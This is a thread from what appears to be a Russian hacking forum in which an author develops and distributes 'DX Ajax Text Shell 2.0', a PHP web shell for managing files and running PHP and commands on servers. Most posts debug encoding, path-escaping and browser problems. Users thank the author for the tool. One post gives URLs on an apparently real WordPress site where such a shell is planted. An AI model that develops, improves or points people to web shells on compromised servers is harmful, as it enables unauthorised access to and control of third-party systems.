![]() |
dx ajax text shell
Вложений: 1
DX Ajax Text Shell 2.0 beta Решил сделать веб-шелл с использованием AJAX. Доработал 1.0, сейчас готова версия 2.0 (пока что beta), вот её описание: Возможности:
Удобство в том, что можно работать с файлами, php, cmd и пр. независимо друг от друга, то есть примерно так - полистать файлы, выполнить пхп-код, вернуться к файлам, в это время результат выполнения php-кода не стирается, и к нему можно всегда вернуться. |
не пашет. локахлост-вынь.
зы. да и кто его юзать будет? если бы р57 под аякс заделать, то гуд.. |
Пашет, проверял на удалённых серверах и на локалхосте тоже. Просто шелл если редактировать, то нужно сохранять в UTF-8 без BOM.
|
хз. у меня пашет. на локал хосте. вынь
|
Все круто. Хотел бы видеть sypex или любой другой быстрый дампер mysql
|
На локалхосте под виндой не работало - все дело в обратных слэшах, которые используются в путях и впоследствии попадают в js-код без экранирования, поэтому в начале кода нужно заменить вот на это:
PHP код:
Код HTML:
<iframe id="upiframe" name="upiframe" style="display:none;width:0;height:0" onload="checkUpFiles();"></iframe>�?мя Права Размер �?зменён r57shell с AJAX хорошая идея имхо |
нахожусь в /var/www/html тыкаю все время вверх до хожу до /var тыкаю - переходит опять в /var/www/html, пишу перейти в / - пишет директория не существует
|
Спасибо всем за замечания, постараюсь всё исправить, хотя я не понимаю, отчего могут возникнуть такие проблемы, как:
-видимый фрейм в ФФ (сам тестил, у меня всё отлично, версия 3) -проблемы с кодировкой (опять-таки всё проверял, но ещё посмотрю, отчего такое может быть) ShAnKaR, такая ошибка действительно есть, поправлю. [Raz0r], если не сложно, напиши, где ещё баги с кодировкой наблюдаются у тебя, и только в ФФ, или в других браузерах тоже? |
Баги в Firefox 3.0.4, Opera 9.62, IE7. В файл менеджере первые буквы Имя и Изменен, а также в слове Информация во вкладках Система и MySQL
|
Не представляю, почему такие ошибки возникают, у меня во всех браузерах всё нормально. Причём, как я понял, только буква "И" искажается) Может быть, проблема в сервере и утф-8?.. Что, если просто создать текстовый файл в утф-8 без BOM и записать туда букву "И", а потом получить его с помощью сервера?:)
|
Доработал версию 1.0, добавил функционал, поправил найденные ошибки.
Обновил первый пост, подробное описание и файл для скачивания там. |
@d_x
тестить нужно не только на IE ;) Кстати ошибок с кодировкой больше нет, спасибо |
Опера всегда отличалась нестандартностью, кстати я тестил на ней, правда на более ранней версии, всё норм было. Посмотрю ещё.
ЗЫ. [Raz0r], в кодировке абсолютно ничего не менял) |
а ты попробуй упросить ее до strtolower на русских буквах
|
Это:
PHP код:
PHP код:
Цитата:
|
Цитата:
Цитата:
насчет strtolower() в доках сказано: Цитата:
|
Цитата:
|
http://www.topmanshoes.com/wp-admin/1.php
Неа Вот шелл, можешь посмотреть содержимое файла http://www.topmanshoes.com/wp-admin/wp-rss.php |
Русской локали на многих серверах может и не оказаться. Проверить можно так:
locale -a | grep 'ru' Вообще нужно вот так: PHP код:
|
На разных системах локали называются по-разному. Я знаю про setlocale, но именно поэтому её и не использовал.
P.S. Кривое отображение в некоторых браузерах поправил, обновил первый пост. P.S.2. Если эта тема похожа на паблик, пусть модераторы её туда перекинут. Чем больше ошибок найдут в скрипте, тем больше я их исправлю и тем лучше он в итоге станет) |
Попросил перенести тему в общий раздел, чтобы быстрее найти ошибки, если они ещё есть.
|
Цитата:
Код:
.header--- Насчёт strtolower_ru - есть strtr() и mb_strtolower(); |
Хм, точно, у меня не тот файл был залит почему-то, сейчас перезалил. Я просто указал фиксированную ширину fieldset'а, чтобы хаки не использовать.
А про strtr забыл, завтра переделаю. |
Цитата:
|
Цитата:
После появления webkit'а и иже с ним (safari 3, Chrome) первенство в соответсятвии стандартам держат опера и webkit, мб оттого, что вебкит опенсурсный зверь и кодерами именно для этих целей допиливается. А вот ФФ, как не прискорбно все дальше уходит в степь IE. Его поведение в какой-то конкретный момент угадать трудно. // зы: ссори за оффтоп |
Давайте не будем разводить старый срач, какой браузер лучше, и уж тем более не надо оскорблений. В любом случае всё, что я пишу, моё личное мнение и других никоим образом не затрагивает. Это лично мне так показалось. Считайте, что я это написал для себя, чтобы не забыть поправить код. Скрипты я тестирую на трёх браузерах - ие, фф и опера - и они будут там работать, я же не говорю, что "не буду делать под какой-то браузер, он мне не нравится".
|
Спс огромное! Шел очень сильно помог, было бы неплохо добавить перемещение - ввел адресс к примеру / и переместился в корневую дерикторию.
|
Цитата:
|
Цитата:
или far 2.0 поставь. Хороший шел, мне понравилось. Добавте возможность: гденибудь рядом с папкой кноповку создать архив. средствами пхп можно gz жать без проблем. а то набирать tar -cf && bzip2 -9 часто бывает не возможным :) и по цветам.. сделайте фон черным а то работать за таким даже пол часа тяжеловато. |
Почему-то на некоторых хостингах нормально идет, а на некоторых вместо текста показывает:
Файлы | Система | Выполнить PHP Иногда вообще не грузится, тогда если убрать авторизацию будет грузиться но опять же с иероглифами и ошибкой: пишет что-то типа Headers already sent.... Видать что-то с кодировкой, не могу понять что |
utf-8 BOM а да пребудет с вами сила скрытая
|
| Время: 09:18 |